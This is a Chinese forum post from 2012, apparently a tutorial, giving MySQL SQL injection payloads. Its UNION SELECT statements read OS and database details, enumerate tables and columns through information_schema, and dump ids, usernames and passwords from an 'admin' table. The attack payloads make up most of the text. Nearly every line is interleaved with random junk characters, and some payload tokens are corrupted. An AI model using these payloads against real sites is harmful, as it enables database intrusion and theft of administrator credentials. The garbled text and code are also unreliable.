本文介绍MYSQL盲注的一些语句和方法2 _' q* v8 @ \% Y6 k; c! p- Z' W
) `* U% @& e2 l% B( e/ @8 q7 I& T学习盲注前先了解下 IFORMATION_SCHEMA 库
0 `1 c% H; K2 U e) r& V6 b1 T4 e+ L% i$ f2 M! A) a% e9 M
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有/ W2 p* d4 c7 s7 D% }
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
, M) n. j) N) q. B1.得到所有数据库名:* {, K( s# |" i4 a0 Q, X8 R
|SCHEMATA ->存储数据库名的表
( @' }9 b/ ~! |- _. @|---字段:SCHEMA_NAME ->数据库名称
) J7 p* o: T! i+ z" ]5 O
( s' `* k0 w. h1 d0 m6 m; N|TABLES ->存储表名% B8 B+ u4 @% |7 t- N
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
2 O2 e4 ]5 q7 M1 k: [# E2 F|---字段:TABLE_NAME ->存储表的表名2 X8 [% S$ U+ ^1 w, B+ p
4 {% U, D$ l2 i6 I3 d! ^
|COLUMNS ->存储的字段名表
2 N. t! j# a; P2 |$ R. G& S4 ]# N|---字段:TABLE_SCHEMA ->该字段所属数据库名
8 T; l8 \; t" }% B3 g2 N|---字段:TABLE_NAME ->存储所属表的名称
8 D8 i2 L* F' T$ e' b# f4 A# z
+ G U" ^5 P( S1 J|---字段:COLUMN_NAME ->该字段的名称
4 l' E5 D v) k" p/ w! y
( S2 e. r, C( o+ g) r. ]2 e: t" `
3 J9 U7 f1 c8 W, U" k: b
2 ~& I6 B1 `) e! D3 {! e( Y- i###########################################################################
+ d0 ], O6 s9 R* {/ ]( b8 `0 ?& A$ x. m: i% j
0x001 获取系统信息:5 ]+ } b8 {; J( ^7 g1 v
' g9 C6 o( {; _' l$ s5 R7 ~' `union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*; O1 x5 V% e, g. r4 }) \
* \( q% t! ]3 w2 b/*& ?1 J; W7 r& O7 b$ O8 p2 a ^
) j2 _9 v# i- V# C+ ^6 v3 m@@global.version_compile_os 获取系统版本
! k: F* r3 `& Q, l. k1 Q8 D
0 ^( d2 J& k+ L( v8 L@@datadir 数据库路径
; r+ U. s# Q5 a( m+ P$ @! idatabase() 当前数据库名称4 g6 ?# o. }# _* ^* Z; o
0x3c62723e 换行HEX值
; v4 C, h- x7 W0 j2 ?
! c& t, [ x, _/ W! D) m*/
0 r0 T# ^$ b" m7 O# c( g! |/ n/ U0 y* O) K( e/ V& c
' }6 I; o) s( h
/ H0 Z; ` R: J0 I2 Z8 g% C2 t
######################################################################
Z" z# n, O3 z. V: s# l, S: j
0x002 获取表名0 S8 J$ [. ~6 n8 R/ C
) ~9 l' l; s' f2 B7 P
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
3 u4 s3 p$ F$ g2 Z5 s, a2 A& T$ @. i6 n' F& U i ?$ [
( ^5 R3 Y# A" D9 A6 M1 |# @
: f( g0 y- N% _. M h2 L) r
/*: X! |+ C+ z* s- \* t, l
# K5 ^9 K! `' A, H' s) x0x67617264656e 为当前数据库名3 P; b2 H+ @& a. l
0 |6 r; u9 F0 x( v2 j4 R; x
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
' {6 U( ~2 D# H+ c9 F$ ~3 T% |! \8 x/ b. k3 V% U
*// u1 ]# i- ]6 h8 }
2 ?2 t+ p9 G2 o4 N; N7 L######################################################################6 b1 U n0 Z) x! U* ~: ^+ t2 Q6 e
" z; X+ R+ o! P- m+ B % a r6 D+ z: j$ ~ p& J4 |! H
/ ]' j3 b7 ?0 F, Z0x003 获取字段. V) m& ]1 Z8 I! d }: {
3 _7 k, |2 g3 X8 C- Y3 x' ]union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
6 e1 o0 |5 C8 ?+ y% [- j' y
0 \4 F# u7 q' O/*8 o. w7 q$ v9 ?+ A _9 s
4 Y; F, x* `& U+ g& p' Ggroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段& m4 n0 W- R3 {$ I3 Q: I1 |& L: G
/ o. s& J8 H) F4 L$ [# C: ?
0x61646d696e ->选择一个表/ E- J* z/ f+ @& C' M' k
, I1 Y6 W- j) ]' n4 G9 ?. e
0x67617264656e ->数据库名
~& C/ O' Z$ R1 i# c& W7 x) G2 C6 X6 D
*/5 O4 |( N0 a8 M4 M8 ? p1 ~0 a
7 G* x% V0 f+ e3 v8 A
##################################################################### z8 |1 n9 Q( w6 ^& x
% H% Q9 Q4 G/ J3 u8 j
/ u) o( Q0 q i% n# p( ~4 B. C% |# ~2 q1 E2 p8 ~! `5 w
0x004 获取数据
! z) t7 m, i6 J0 Y& t1 m" \2 q
- T* f6 o. T# ~$ r$ }union select 1,2,39 o0 _( C) w; r$ F: i
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
9 c- n: J1 ^4 c( `1 w, u- X
& ~4 t) D0 ^2 T5 N2 k0 Kunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
4 h9 y' ^6 m; F. A. ]# Y
, q& ]. t0 D" A: v6 i( j1 s9 J & x4 n" D( L3 e7 T- h6 L
) L( p6 Q4 N0 n' v' S
/*
+ R2 c8 {5 v& H# G& [
X, K o& X) \1 z; k% z0x3c62723e 换行符号HEX编码1 }2 f: F1 Z) \1 M& K
" ~4 y' Z& s, l. v7 X4 }group_concat 同时获得该字段所有数据# p% Q% f$ j9 T& `3 r
- F, @' T7 ^3 v5 }( e2 F) E*/6 d2 x# N" F- K0 d( ^# z" c% V
( p9 q+ a; h6 h" \+ V6 F
|
发表于 2012-9-13 17:48:44
收藏
支持
反对